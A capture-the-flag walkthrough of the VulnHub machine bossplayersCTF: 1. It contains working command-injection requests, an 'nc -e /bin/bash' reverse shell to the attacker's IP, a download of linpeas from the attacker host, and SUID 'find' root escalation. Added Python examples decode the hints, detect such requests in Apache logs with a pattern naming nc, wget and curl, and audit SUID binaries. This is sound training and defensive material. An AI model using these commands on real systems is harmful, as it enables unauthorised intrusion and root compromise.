bossplayersCTF: 1
Author: jason_huawen
Basic information about the target machine
Name: bossplayersCTF: 1
URL:
https://www.vulnhub.com/entry/bossplayersctf-1,375/
Hint: Aimed at Beginner Security Professionals who want to get their feet wet
into doing some CTF's. It should take around 30 minutes to root.
Identifying the target host's IP address
┌──(kali㉿kali)-[~/Vulnhub/bossplayersCTF]
└─$ sudo netdiscover -i eth1
Currently scanning: 192.168.84.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:f3:da:85 1 60 PCS Systemtechnik GmbH
192.168.56.247 08:00:27:39:e5:5e 1 60 PCS Systemtechnik GmbH
Using the netdiscover tool bundled with Kali Linux, the target host's IP address is identified as 192.168.56.247
NMAP scan
┌──(kali㉿kali)-[~/Vulnhub/bossplayersCTF]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.247 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-01 08:11 EST
Nmap scan report for bogon (192.168.56.247)
Host is up (0.000072s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10 (protocol 2.0)
| ssh-hostkey:
| 2048 ac:0d:1e:71:40:ef:6e:65:91:95:8d:1c:13:13:8e:3e (RSA)
| 256 24:9e:27:18:df:a4:78:3b:0d:11:8a:92:72:bd:05:8d (ECDSA)
|_ 256 26:32:8d:73:89:05:29:43:8e:a1:13:ba:4f:83:53:f8 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
MAC Address: 08:00:27:39:E5:5E (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.78 seconds
The NMAP scan shows that the target host has 2 open ports: 22 (SSH) and 80 (HTTP)
Getting a shell
┌──(kali㉿kali)-[~/Vulnhub/bossplayersCTF]
└─$ curl http://192.168.56.247/
<!DOCTYPE html>
<html>
<body>
<h2>bossplayers CTF - created by Cuong Nguyen</h2>
<p>Difficulty Level: [* ] [ ] [ ] [ ] [ ]</p>
<p>Description: Hello! Extremely easy CTF that I created for those who want to get their feet wet. Have a methodology and avoid the rabit holes! I hope you enjoy this and most importantly, please have fun!</p>
<p>Website: sudocuong.com</p>
</body>
</html>
<!--WkRJNWVXRXliSFZhTW14MVkwaEtkbG96U214ak0wMTFZMGRvZDBOblBUMEsK-->
The page source returned on port 80 contains an HTML comment:
Decoding it with CyberChef shows three layers of base64 encoding; decoding gives:
workinginprogress.php
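The three-layer decoding above, done here as an added example that is not part of the original write-up: a small Python routine that keeps base64-decoding as long as the output is still printable ASCII, so it recovers nested encodings such as this comment (and the single-layer robots.txt value below) without counting layers by hand. The constant names and the printable-text heuristic are my own.

```python
import base64
import binascii

# The HTML comment from the index page and the robots.txt value of this write-up.
INDEX_COMMENT = "WkRJNWVXRXliSFZhTW14MVkwaEtkbG96U214ak0wMTFZMGRvZDBOblBUMEsK"
ROBOTS_VALUE = "bG9sIHRyeSBoYXJkZXIgYnJvCg=="


def _looks_like_text(data: bytes) -> bool:
    """True when the bytes are printable ASCII (plus CR/LF/TAB)."""
    try:
        text = data.decode("ascii")
    except UnicodeDecodeError:
        return False
    return all(ch.isprintable() or ch in "\r\n\t" for ch in text)


def peel_base64(blob: str, max_layers: int = 10) -> list:
    """Repeatedly base64-decode `blob` while the result is still printable text.

    Returns the decoded text of each layer, outermost first, innermost last.
    Decoding stops at the first layer that is not strict base64 (validate=True
    rejects characters outside the alphabet and bad padding) or whose bytes
    are not text, so the final plaintext is never decoded a step too far.
    """
    layers = []
    current = blob.strip()
    for _ in range(max_layers):
        try:
            raw = base64.b64decode(current, validate=True)
        except (binascii.Error, ValueError):
            break
        if not raw or not _looks_like_text(raw):
            break
        current = raw.decode("ascii").strip()
        layers.append(current)
    return layers


if __name__ == "__main__":
    for i, layer in enumerate(peel_base64(INDEX_COMMENT), 1):
        print(f"layer {i}: {layer}")
    print("robots.txt:", peel_base64(ROBOTS_VALUE))
```

The strict `validate=True` flag matters: with the default lenient decoding, a final plaintext containing stray characters could still "decode" into garbage and produce a bogus extra layer.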
┌──(kali㉿kali)-[~/Vulnhub/bossplayersCTF]
└─$ curl http://192.168.56.247/workinginprogress.php
<html>
<body>
<h3>System Install:</h3>
<p>Linux Debian - [*]</p>
<p>APACHE2 - [*]</p>
<p>PHP - [*]</p>
<h3>Outstanding:</h3>
<p>Test ping command - [ ]</p>
<p>Fix Privilege Escalation - [ ]</p>
<h3>Completed:</h3>
<p>Say Hi to Haley - [*]</p>
</body>
</html>
Does this suggest that the username is haley?
┌──(kali㉿kali)-[~/Vulnhub/bossplayersCTF]
└─$ curl http://192.168.56.247/robots.txt
super secret password - bG9sIHRyeSBoYXJkZXIgYnJvCg==
┌──(kali㉿kali)-[~/Vulnhub/bossplayersCTF]
└─$ echo 'bG9sIHRyeSBoYXJkZXIgYnJvCg==' -n | base64 -d
lol try harder bro
base64: invalid input
┌──(kali㉿kali)-[~/Vulnhub/bossplayersCTF]
└─$ echo 'bG9sIHRyeSBoYXJkZXIgYnJvCg==' | base64 -d
lol try harder bro
┌──(kali㉿kali)-[~/Vulnhub/bossplayersCTF]
└─$ gobuster dir -u http://192.168.56.247 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.247
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/01 08:17:56 Starting gobuster in directory enumeration mode
===============================================================
/server-status (Status: 403) [Size: 302]
Progress: 218950 / 220561 (99.27%)===============================================================
2022/12/01 08:18:22 Finished
===============================================================
No directories were found.
┌──(kali㉿kali)-[~/Vulnhub/bossplayersCTF]
└─$ gobuster dir -u http://192.168.56.247 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.sh,.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.247
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: txt,php,html,sh
[+] Timeout: 10s
===============================================================
2022/12/01 08:19:11 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 293]
/index.html (Status: 200) [Size: 575]
/.html (Status: 403) [Size: 294]
/robots.txt (Status: 200) [Size: 53]
/logs.php (Status: 200) [Size: 34093]
/.php (Status: 403) [Size: 293]
/.html (Status: 403) [Size: 294]
/server-status (Status: 403) [Size: 302]
Progress: 1100003 / 1102805 (99.75%)===============================================================
2022/12/01 08:21:29 Finished
=============================================================
Found the /logs.php file, but accessing it returns what appears to be some system log information.
workinginprogress.php mentions a ping command, so that page probably executes commands; use wfuzz to fuzz out the parameter name:
┌──(kali㉿kali)-[~/Vulnhub/bossplayersCTF]
└─$ wfuzz -c -u http://192.168.56.247/workinginprogress.php?FUZZ=id -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --hw 36
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.56.247/workinginprogress.php?FUZZ=id
Total requests: 220560
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000005340: 200 25 L 39 W 325 Ch "cmd"
Fuzzing yields the parameter cmd; confirm it manually:
┌──(kali㉿kali)-[~/Vulnhub/bossplayersCTF]
└─$ curl http://192.168.56.247/workinginprogress.php?cmd=id
<html>
<body>
<h3>System Install:</h3>
<p>Linux Debian - [*]</p>
<p>APACHE2 - [*]</p>
<p>PHP - [*]</p>
<h3>Outstanding:</h3>
<p>Test ping command - [ ]</p>
<p>Fix Privilege Escalation - [ ]</p>
<h3>Completed:</h3>
<p>Say Hi to Haley - [*]</p>
</body>
</html>
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Next, try to obtain a shell: use the command execution vulnerability to check whether nc and similar tools are available:
┌──(kali㉿kali)-[~/Vulnhub/bossplayersCTF]
└─$ curl http://192.168.56.247/workinginprogress.php?cmd=which%20nc
<html>
<body>
<h3>System Install:</h3>
<p>Linux Debian - [*]</p>
<p>APACHE2 - [*]</p>
<p>PHP - [*]</p>
<h3>Outstanding:</h3>
<p>Test ping command - [ ]</p>
<p>Fix Privilege Escalation - [ ]</p>
<h3>Completed:</h3>
<p>Say Hi to Haley - [*]</p>
</body>
</html>
/usr/bin/nc
Visiting the following URL in the browser yields a shell:
http://192.168.56.247/workinginprogress.php?cmd=nc%20-e%20/bin/bash%20192.168.56.206%205555
┌──(kali㉿kali)-[~/Vulnhub/bossplayersCTF]
└─$ sudo nc -nlvp 5555
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.247] 36778
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@bossplayers:/var/www/html$
Shell obtained.
Privilege escalation
Upload the linpeas.sh script to the target's /tmp directory, make it executable, and run it:
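Seen from the web server's side, the requests in this section leave a distinctive trace in Apache's access log: first a burst of requests to one path with a different parameter name on every request (the wfuzz run), then query values that contain shell syntax. The following Python is an added example, not part of the original write-up, that parses combined-format log lines and flags both patterns. The sample log lines are constructed to mirror the requests shown above; the regular expressions, the threshold and the client addresses are my own assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Apache "combined" access-log format; only the leading fields are needed.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Assumed list: shell metacharacters, absolute paths and command names that
# have no business in a query value of a static status page.
SUSPICIOUS_VALUE_RE = re.compile(
    r'(;|\|\||&&|`|\$\(|/bin/|/etc/passwd|\b(id|whoami|nc|which|wget|curl|python)\b)'
)


def parse_line(line):
    """Return a dict with ip, ts, method, path, params, status, or None if unparsable."""
    m = LOG_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    # parse_qsl percent-decodes values, so "nc%20-e" is inspected as "nc -e".
    rec["params"] = parse_qsl(parts.query, keep_blank_values=True)
    return rec


def find_injection_attempts(lines):
    """(ip, path, param, value) for every query value that looks like a shell command."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for name, value in rec["params"]:
            if SUSPICIOUS_VALUE_RE.search(value):
                hits.append((rec["ip"], rec["path"], name, value))
    return hits


def find_parameter_fuzzing(lines, threshold=50):
    """{(ip, path): n} for clients that sent at least `threshold` distinct
    parameter names to one path, the signature of a wfuzz-style parameter scan."""
    names = defaultdict(set)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for name, _ in rec["params"]:
            names[(rec["ip"], rec["path"])].add(name)
    return {key: len(v) for key, v in names.items() if len(v) >= threshold}


# Constructed sample log, modelled on the requests in this write-up.
def _line(ip, target, sec, ua):
    return (f'{ip} - - [01/Dec/2022:08:{sec // 60:02d}:{sec % 60:02d} -0500] '
            f'"GET {target} HTTP/1.1" 200 325 "-" "{ua}"')


SAMPLE_LOG = [_line("10.0.0.5", "/index.html", 0, "Mozilla/5.0"),
              _line("10.0.0.5", "/robots.txt", 1, "Mozilla/5.0")]
# 60 parameter-name guesses in one minute, as a wfuzz run would produce.
SAMPLE_LOG += [_line("192.168.56.206", f"/workinginprogress.php?param{i}=id", 60 + i, "wfuzz")
               for i in range(60)]
SAMPLE_LOG += [
    _line("192.168.56.206", "/workinginprogress.php?cmd=id", 200, "curl"),
    _line("192.168.56.206", "/workinginprogress.php?cmd=which%20nc", 201, "curl"),
    _line("192.168.56.206",
          "/workinginprogress.php?cmd=nc%20-e%20/bin/bash%20192.168.56.206%205555", 202, "Mozilla/5.0"),
]

if __name__ == "__main__":
    for hit in find_injection_attempts(SAMPLE_LOG):
        print("injection-like value:", hit)
    for (ip, path), n in find_parameter_fuzzing(SAMPLE_LOG).items():
        print(f"parameter fuzzing: {ip} tried {n} names on {path}")
```

The value check is deliberately applied after percent-decoding, since the log stores the request line as sent; the fuzzing check needs no signature at all, only the count of distinct names per client and path, which is why it also catches scans that use a harmless value.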
www-data@bossplayers:/var/www/html$ cd /tmp
cd /tmp
www-data@bossplayers:/tmp$ wget http://192.168.56.206:8000/linpeas.sh
wget http://192.168.56.206:8000/linpeas.sh
--2022-12-02 00:55:53-- http://192.168.56.206:8000/linpeas.sh
Connecting to 192.168.56.206:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 765823 (748K) [text/x-sh]
Saving to: 'linpeas.sh'
linpeas.sh 100%[===================>] 747.87K --.-KB/s in 0.003s
2022-12-02 00:55:53 (239 MB/s) - 'linpeas.sh' saved [765823/765823]
www-data@bossplayers:/tmp$ chmod +x linpeas.sh
chmod +x linpeas.sh
www-data@bossplayers:/tmp$ ./linpeas.sh
./linpeas.sh
/---------------------------------------------------------------------------\
| Do you like PEASS? |
|---------------------------------------------------------------------------|
| Become a Patreon : https://www.patreon.com/peass |
| Follow on Twitter : @carlospolopm |
| Respect on HTB : SirBroccoli |
|---------------------------------------------------------------------------|
| Thank you! |
\---------------------------------------------------------------------------/
linpeas-ng by carlospolop
ADVISORY: This script should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own computers and/or with the computer owner's permission.
Linux Privesc Checklist: https://book.hacktricks.xyz/linux-unix/linux-privilege-escalation-checklist
LEGEND:
RED/YELLOW: 95% a PE vector
RED: You should take a look to it
LightCyan: Users with console
Blue: Users without console & mounted devs
Green: Common things (users, groups, SUID/SGID, mounts, .sh scripts, cronjobs)
LightMagenta: Your username
Starting linpeas. Caching Writable Folders...
In the linpeas.sh output:
═════════════════════════════════════════╣ Interesting Files ╠═════════════════════════════════════════
╚═══════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-unix/privilege-escalation#sudo-and-suid
strings Not Found
strace Not Found
-rwsr-xr-x 1 root root 51K Jan 10 2019 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 35K Jan 10 2019 /usr/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 83K Jul 27 2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 63K Jan 10 2019 /usr/bin/su
-rwsr-xr-x 1 root root 44K Jul 27 2018 /usr/bin/chsh
-rwsr-sr-x 1 root root 195K Jan 8 2019 /usr/bin/grep
-rwsr-xr-x 1 root root 53K Jul 27 2018 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 63K Jul 27 2018 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-sr-x 1 root root 309K Feb 16 2019 /usr/bin/find
-rwsr-xr-x 1 root root 44K Jul 27 2018 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-- 1 root messagebus 50K Jun 10 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 427K Apr 8 2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10K Mar 28 2017 /usr/lib/eject/dmcrypt-get-device
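From a hardening point of view, the SUID listing above is exactly the inventory a host check should diff against a baseline: find and grep are not setuid on a stock Debian 10 install, so their presence here is the finding. The following Python is an added example, not part of the original write-up or of linpeas: it parses ls -l style lines like those above into mode bits, reports setuid-root files that are missing from an expected set, and can also take a live inventory of the filesystem. The baseline set, the owner-to-uid mapping and the sample lines are my own assumptions drawn from this page.

```python
import os
import stat

# Assumed baseline: binaries that are setuid root on a stock Debian 10
# install (the listing in this write-up minus find and grep).
EXPECTED_SUID_ROOT = {
    "/usr/bin/mount", "/usr/bin/umount", "/usr/bin/gpasswd", "/usr/bin/su",
    "/usr/bin/chsh", "/usr/bin/chfn", "/usr/bin/passwd", "/usr/bin/newgrp",
    "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/eject/dmcrypt-get-device",
}


def symbolic_to_mode(perms):
    """Convert an ls -l permission string such as '-rwsr-sr-x' to st_mode bits."""
    mode = stat.S_IFREG if perms[0] == "-" else 0
    rwx = [stat.S_IRUSR, stat.S_IWUSR, stat.S_IXUSR,
           stat.S_IRGRP, stat.S_IWGRP, stat.S_IXGRP,
           stat.S_IROTH, stat.S_IWOTH, stat.S_IXOTH]
    special = {2: stat.S_ISUID, 5: stat.S_ISGID, 8: stat.S_ISVTX}
    for i, ch in enumerate(perms[1:10]):
        if ch in "rwx":
            mode |= rwx[i]
        elif ch in "sStT":          # special bit; lowercase also means x is set
            mode |= special[i]
            if ch in "st":
                mode |= rwx[i]
    return mode


def parse_ls_line(line):
    """Turn 'perms links owner group size Mon DD YYYY path [annotation]' into
    (path, mode, uid). Only root matters here, so other owners map to -1
    (assumed simplification; a real check would resolve names via pwd)."""
    f = line.split()
    uid = 0 if f[2] == "root" else -1
    return f[8], symbolic_to_mode(f[0]), uid


def scan_filesystem(roots=("/usr", "/bin", "/sbin")):
    """Live inventory of regular files under roots as (path, mode, uid)."""
    found = []
    for root in roots:
        for dirpath, _, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue
                found.append((path, st.st_mode, st.st_uid))
    return found


def unexpected_suid_root(entries, expected=EXPECTED_SUID_ROOT):
    """Paths that are setuid root (regular files) but absent from the baseline."""
    return sorted(
        path for path, mode, uid in entries
        if stat.S_ISREG(mode) and mode & stat.S_ISUID and uid == 0
        and path not in expected
    )


# Sample lines copied from the linpeas SUID section of this write-up.
SAMPLE_LISTING = [
    "-rwsr-xr-x 1 root root 51K Jan 10 2019 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8",
    "-rwsr-xr-x 1 root root 63K Jan 10 2019 /usr/bin/su",
    "-rwsr-sr-x 1 root root 195K Jan 8 2019 /usr/bin/grep",
    "-rwsr-xr-x 1 root root 63K Jul 27 2018 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)",
    "-rwsr-sr-x 1 root root 309K Feb 16 2019 /usr/bin/find",
    "-rwsr-xr-- 1 root messagebus 50K Jun 10 2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "-rwsr-xr-x 1 root root 427K Apr 8 2019 /usr/lib/openssh/ssh-keysign",
]

if __name__ == "__main__":
    entries = [parse_ls_line(line) for line in SAMPLE_LISTING]
    print("not on baseline:", unexpected_suid_root(entries))
    # On a real host: unexpected_suid_root(scan_filesystem())
```

Running the same comparison from cron and alerting on any new entry turns the one-off linpeas check into a continuous control; the baseline should be regenerated after package upgrades, since dpkg may legitimately add or drop setuid files.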
Use the SUID bit on the find binary to escalate privileges, following the method given on the GTFOBins site:
www-data@bossplayers:/tmp$ /usr/bin/find . -exec /bin/sh -p \; -quit
/usr/bin/find . -exec /bin/sh -p \; -quit
# cd /root
cd /root
# ls -alh
ls -alh
total 24K
drwx------ 2 root root 4.0K Sep 28 2019 .
drwxr-xr-x 18 root root 4.0K Sep 28 2019 ..
-rw------- 1 root root 929 Sep 28 2019 .bash_history
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
-rw-r--r-- 1 root root 148 Aug 18 2015 .profile
-rw-r--r-- 1 root root 25 Sep 28 2019 root.txt
# cat root.txt
cat root.txt
Y29uZ3JhdHVsYXRpb25zCg==
#
Root flag obtained.
Lessons learned
- The first instinct was correct: there is a command execution vulnerability to exploit, because the author mentioned ping. But when fuzzing with FUZZ=test, since test is not a real command, the response for the correct parameter name was identical to the response for a wrong one, so the correct parameter could not be spotted. The right fuzzing payload for command execution is FUZZ=id, and for local file inclusion testing it is FUZZ=../../../../../../etc/passwd
- The rabbit hole the author mentioned is probably haley: assuming it is a username and then trying to crack it with hydra.